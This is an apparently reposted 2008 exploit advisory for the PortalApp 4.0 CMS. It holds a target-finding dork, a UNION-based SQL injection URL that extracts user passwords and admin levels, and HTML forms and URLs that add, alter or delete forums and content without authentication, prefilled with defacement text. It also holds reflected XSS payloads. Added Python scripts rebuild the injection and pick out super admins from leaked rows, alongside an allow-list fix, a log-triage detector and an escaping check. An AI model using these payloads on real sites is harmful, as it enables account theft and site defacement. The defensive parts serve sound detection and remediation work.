PortalApp 4.0 (SQL/XSS/Auth Bypasses) Multiple Remote Vulnerabilities

07 Jan 2008 00:00:00, reported by RootType
Source: seebug (www.seebug.org)

PortalApp 4.0 Multiple Remote Vulnerabilities

##############################################################################
#Title: PortalApp 4.0 Multiple vulnerabilities                               #
#                                                                            #
#Discovered By: r3dm0v3                                                      #
#               http://r3dm0v3.persianblog.ir                                #
#               r3dm0v3( 4t }yahoo[dot}com                                   #
#               Tehran - Iran                                                #
#                                                                            #
#Vendor: http://www.portalapp.com                                            #
#Vulnerable Version: 4.0, prior versions may be vulnerable                   #
#Remote Exploit: Yes                                                         #
#Dork: "Copyright @2007 Iatek LLC"                                           #
#Fix: Not Available                                                          #
##############################################################################

##############################################################################
#                       SQL Injection (CRITICAL)                             #
##############################################################################
#Description:
PortalApp is a Content Management System (CMS) for websites.
Bug: the 'sortby' request parameter is concatenated into the SQL statement without any validation, so a UNION SELECT appended to it reads arbitrary columns from the Users table.

#Exploit:
http://site.com/forums.asp?keywords=r3dm0v3&do_search=1&sortby=users.user_name+UNION+SELECT+1,2,3,4,5,password,user_name,8,9,10,user_id,accesslevel,13,14,15+FROM+Users

The numeric fillers pad the UNION to the 15 columns of the original query; the injected Users columns surface in the search result list as follows:
author  = user_name
topic   = password
replies = user_id
views   = accesslevel (5 is super admin)
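The following is an added example and not part of the original advisory: it rebuilds the 'sortby' payload above from its column positions, maps a displayed result row back to Users fields, and places the allow-list check that removes the bug next to it. The host site.com is the advisory's placeholder; the column names in ALLOWED_SORT are hypothetical, since PortalApp's real schema is not given.

```python
"""
Added example (not part of the original advisory): rebuilds the 'sortby'
UNION SELECT payload from the advisory URL, maps the page's search-result
columns back to Users fields, and shows the allow-list check that removes
the bug. Assumptions are marked inline.
"""
from urllib.parse import urlencode

BASE_URL = "http://site.com/forums.asp"   # placeholder host, as in the advisory
NUM_COLUMNS = 15                          # the original SELECT has 15 columns (UNION must match)

# Users column -> 1-based position in the UNION SELECT, straight from the advisory URL.
INJECTED = {"password": 6, "user_name": 7, "user_id": 11, "accesslevel": 12}

# Where those positions surface in the rendered search results, per the advisory.
RESULT_TO_FIELD = {"topic": "password", "author": "user_name",
                   "replies": "user_id", "views": "accesslevel"}
SUPER_ADMIN_LEVEL = "5"


def build_sortby(fields=INJECTED, n=NUM_COLUMNS, table="Users", lead="users.user_name"):
    """Valid leading sort column, then a UNION SELECT padded with numeric fillers."""
    slots = [str(i) for i in range(1, n + 1)]
    for column, position in fields.items():
        slots[position - 1] = column
    return f"{lead} UNION SELECT {','.join(slots)} FROM {table}"


def build_url(keyword="r3dm0v3"):
    """Full search URL; urlencode() turns the spaces into '+' like the advisory."""
    return BASE_URL + "?" + urlencode(
        {"keywords": keyword, "do_search": 1, "sortby": build_sortby()})


def decode_row(row):
    """Turn one displayed result row (author/topic/replies/views) into Users fields."""
    return {RESULT_TO_FIELD[k]: v for k, v in row.items() if k in RESULT_TO_FIELD}


def super_admins(rows):
    """Usernames whose leaked accesslevel marks them as super admin."""
    return [decode_row(r)["user_name"] for r in rows
            if decode_row(r)["accesslevel"] == SUPER_ADMIN_LEVEL]


# --- the fix: never splice the parameter into SQL; look it up in an allow-list ---
# These column names are hypothetical; PortalApp's real schema is not in the advisory.
ALLOWED_SORT = {"author": "users.user_name", "date": "topics.date_last",
                "replies": "topics.replies"}


def safe_sortby(value):
    """Return a fixed ORDER BY expression for a known key, or None for anything else."""
    return ALLOWED_SORT.get(value)


# Constructed sample of what the page would display after the injection.
SAMPLE_ROWS = [
    {"author": "admin", "topic": "P@ssw0rd", "replies": "1", "views": "5"},
    {"author": "guest", "topic": "guest", "replies": "17", "views": "1"},
]

if __name__ == "__main__":
    print(build_url())
    for r in SAMPLE_ROWS:
        print(decode_row(r))
    print("super admins:", super_admins(SAMPLE_ROWS))
    print("allow-list result for payload:", safe_sortby(build_sortby()))
```

The allow-list is the whole fix: the request value is only ever a dictionary key, so the payload string above can never reach the query text.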


##############################################################################
# The following actions in 'forums.asp' need no authentication at all.       #
##############################################################################
create a forum:
<html>
<form action=http://site.com/forums.asp?action=insert_level1_edit_disc_forums method=post>
 userid:<input type=text name=user_id value=255>by default 255 is sa<br>
 ForumName:<input type=text name=ForumName value="H4c|<3d bY r3dm0v3"><br>
 Description:<input type=text name=Description value="r3dm0v3 was here. <a href=http://r3dm0v3.persianblog.ir>http://r3dm0v3.persianblog.ir</a>"><br>
 ForumSection:<input type=text name=ForumSection value="Hacked"><br>
 DisplayOrder:<input type=text name=DisplayOrder value=1><br>
 <input type=submit>
</form>
</html>

create a topic:
<html>
<form action=http://site.com/forums.asp?action=insert_level2_edit_disc_topics method=post>
 userid:<input type=text name=user_id value=255>by default 255 is sa<br>
 ForumID:<input type=text name=ForumId value="">(fill in an existing ForumID)<br>
 Subject:<input type=text name=Subject value="r3dm0v3."><br>
 Message:<br><textarea rows=3 cols=50 name=Message>r3dm0v3 was here.</textarea><br>
 Icon:<input type=text name=Icon value=14><br>
 Show Signature:<input type=text name=Showsignature value=0><br>
 Notify:<input type=text name=Notify ><br>
 Locked:<input type=text name=Locked value=1><br>
 Sticky:<input type=text name=Sticky ><br>
 Date:<input type=text name=DateAdded value="6/1/2008"><br>
 DateLast:<input type=text name=DateLast value="6/1/2008"><br>
 <input type=submit>
</form>
</html>

delete a forum: http://site.com/forums.asp?action=delete_level1_edit_disc_forums&ForumId=[ForumID]
delete a topic: http://site.com/forums.asp?action=delete_level2_edit_disc_topics&TopicId=[TopicID]
delete a reply: http://site.com/forums.asp?action=delete_level3_edit_disc_replies&ReplyId=[ReplyID]
delete a topic reply: http://site.com/forums.asp?action=delete_level2_disc_replies&TopicId=[TopicID]&ReplyId=[ReplyID]

#Other actions in 'forums.asp', exposed the same way:
insert_level3_edit_disc_replies
insert_detail_disc_topics
update_level1_edit_disc_forums
update_level2_edit_disc_topics
update_level3_edit_disc_replies
update_detail_disc_topics
update_level2_disc_replies


##############################################################################
# The following actions in 'content.asp' need no authentication at all.      #
##############################################################################
Add content:
<html>
<form action=http://site.com/content.asp?action=insert_detail_default method=post>
 userid:<input type=text name=user_id value=255>by default 255 is sa<br>
 ContentTypeID:<input type=text name=ContentTypeID value=2>1:general(company) 2:article 3:link 4:news 5:announcement 6:download 7:gallery 8:faq ...<br>
 catID:<input type=text name=CatID value=198><br>
 Date:<input type=text name=DateAdded value="6/1/2008"><br>
 Author:<input type=text name=Author value=r3dm0v3><br>
 title:<input type=text name=Title value="h4ck3d bY r3dm0v3"><br>
 ShortDesc:<br><textarea rows=3 cols=50 name=ShortDesc>r3dm0v3 was here.</textarea><br>
 LongDesc:<br><textarea rows=4 cols=50  name=LongDesc>r3dm0v3 was here. http://r3dm0v3.persianblog.ir</textarea><br>
 RelatedURL:<input type=text name=RelatedURL value="http://r3dm0v3.persianblog.ir"><br>
 DownloadURL:<input type=text name=DownloadURL><br>
 Filename:<input type=text name=Filename><br>
 Thumbnail:<input type=text name=Thumbnail><br>
 Image1:<input type=text name=Image1><br>
 PrevContentID:<input type=text name=PrevContentId><br>
 NextContentID:<input type=text name=NextContentId><br>
 views:<input type=text name=Impressions value=10000><br>
 AVGRating:<input type=text name=AvgRating value=10000><br>
 <input type=submit>
</form>
</html>

The 'insert_detail_content' action is vulnerable in the same way; use the form above with action=insert_detail_content.
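As an added example (not from the advisory or the vendor), the triage script below reads IIS W3C log lines and flags the three things described on this page: hits on the unauthenticated forums.asp/content.asp actions listed above, a 'sortby' carrying a UNION, and a 'keywords' value containing markup. The log lines are constructed for the example; the action names are the ones the advisory lists.

```python
"""
Added example (not part of the original advisory): a small triage script
for IIS W3C extended logs. It flags privileged forums.asp/content.asp
actions (which the application does not gate behind a login), a 'sortby'
containing UNION, and tag-like markup in 'keywords'. SAMPLE_LOG is
constructed; the action names come from the advisory.
"""
import re
from urllib.parse import parse_qs

PRIVILEGED_ACTIONS = {
    "forums.asp": {
        "insert_level1_edit_disc_forums", "insert_level2_edit_disc_topics",
        "insert_level3_edit_disc_replies", "insert_detail_disc_topics",
        "update_level1_edit_disc_forums", "update_level2_edit_disc_topics",
        "update_level3_edit_disc_replies", "update_detail_disc_topics",
        "update_level2_disc_replies", "delete_level1_edit_disc_forums",
        "delete_level2_edit_disc_topics", "delete_level3_edit_disc_replies",
        "delete_level2_disc_replies",
    },
    "content.asp": {"insert_detail_default", "insert_detail_content"},
}
TAG_LIKE = re.compile(r"<\s*/?\s*[a-z]", re.I)   # '<script', '</script', '<img ...'
UNION = re.compile(r"\bunion\b", re.I)

# Constructed sample log (W3C extended format as written by IIS).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2008-01-07 10:00:01 203.0.113.5 GET /forums.asp keywords=r3dm0v3&do_search=1&sortby=users.user_name+UNION+SELECT+1,2,3,4,5,password,user_name,8,9,10,user_id,accesslevel,13,14,15+FROM+Users 200
2008-01-07 10:00:09 203.0.113.5 POST /forums.asp action=insert_level1_edit_disc_forums 302
2008-01-07 10:00:15 203.0.113.5 GET /forums.asp action=delete_level1_edit_disc_forums&ForumId=3 302
2008-01-07 10:01:02 198.51.100.9 GET /forums.asp keywords=printers&do_search=1&sortby=date 200
2008-01-07 10:02:30 198.51.100.9 GET /content.asp ContentType=General&keywords=%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&do_search=1 200
2008-01-07 10:03:00 198.51.100.9 GET /content.asp ContentType=News&do_search=0 200
"""


def parse_w3c(text):
    """Parse W3C extended log text into dicts keyed by the #Fields header."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip() or fields is None:
            continue
        else:
            parts = line.split()
            if len(parts) == len(fields):          # skip malformed lines
                rows.append(dict(zip(fields, parts)))
    return rows


def triage(rows):
    """Return one finding per suspicious (row, reason); a row may yield several."""
    findings = []
    for row in rows:
        stem = row["cs-uri-stem"].rsplit("/", 1)[-1].lower()
        raw = row["cs-uri-query"]                  # IIS logs '-' for an empty query
        params = parse_qs("" if raw == "-" else raw, keep_blank_values=True)
        action = params.get("action", [""])[0].lower()
        sortby = params.get("sortby", [""])[0]
        keywords = params.get("keywords", [""])[0]

        def hit(reason):
            findings.append({"time": row["time"], "c-ip": row["c-ip"],
                             "uri": stem, "reason": reason})

        if UNION.search(sortby):
            hit("sqli")
        if action in PRIVILEGED_ACTIONS.get(stem, ()):
            hit("privileged_action")   # must be matched to a genuine admin session
        if TAG_LIKE.search(keywords):
            hit("xss")
    return findings


if __name__ == "__main__":
    for finding in triage(parse_w3c(SAMPLE_LOG)):
        print(finding)
```

Because the application performs no authorization check on these actions, every privileged_action finding has to be reconciled against an administrator's real session; the log alone cannot tell a legitimate edit from an anonymous one.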


##############################################################################
#                                   XSS                                      #
##############################################################################
http://site.com/forums.asp?keywords=%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&do_search=1
http://site.com/content.asp?ContentType=General&keywords=%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&do_search=1
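The added example below (not part of the original advisory) decodes the two XSS URLs above and reflects the payload the way a vulnerable search form would. The leading %27%3E ('>) only makes sense if 'keywords' is echoed into a single-quoted attribute value, so that reflection context is an assumption; an HTML parser then checks whether a new script element was created, and the escaped variant shows the fix.

```python
"""
Added example (not part of the original advisory): URL-decodes the two XSS
payloads, reflects them into an assumed <input value='...'> context, and
uses an HTML parser to decide whether the payload broke out of the
attribute. render_safe() is the corrected form.
"""
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# The two URLs given in the advisory (site.com is its placeholder host).
ADVISORY_URLS = [
    "http://site.com/forums.asp?keywords=%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&do_search=1",
    "http://site.com/content.asp?ContentType=General&keywords=%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&do_search=1",
]


def keywords_from(url):
    """Decoded 'keywords' parameter, as the server-side script would see it."""
    return parse_qs(urlsplit(url).query)["keywords"][0]


def render_unsafe(keywords):
    """Assumed vulnerable pattern: raw parameter written back into the search box."""
    return f"<input type=text name=keywords value='{keywords}'>"


def render_safe(keywords):
    """Fix: HTML-encode (quotes included) before reflecting into an attribute."""
    return f"<input type=text name=keywords value='{html.escape(keywords, quote=True)}'>"


class TagCollector(HTMLParser):
    """Records every start tag the browser would see."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def injected_script(page):
    """True if the reflected payload produced a real <script> element."""
    parser = TagCollector()
    parser.feed(page)
    parser.close()
    return "script" in parser.tags


if __name__ == "__main__":
    for url in ADVISORY_URLS:
        kw = keywords_from(url)
        print(repr(kw))
        print("unsafe breaks out:", injected_script(render_unsafe(kw)))
        print("escaped breaks out:", injected_script(render_safe(kw)))
```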
                              
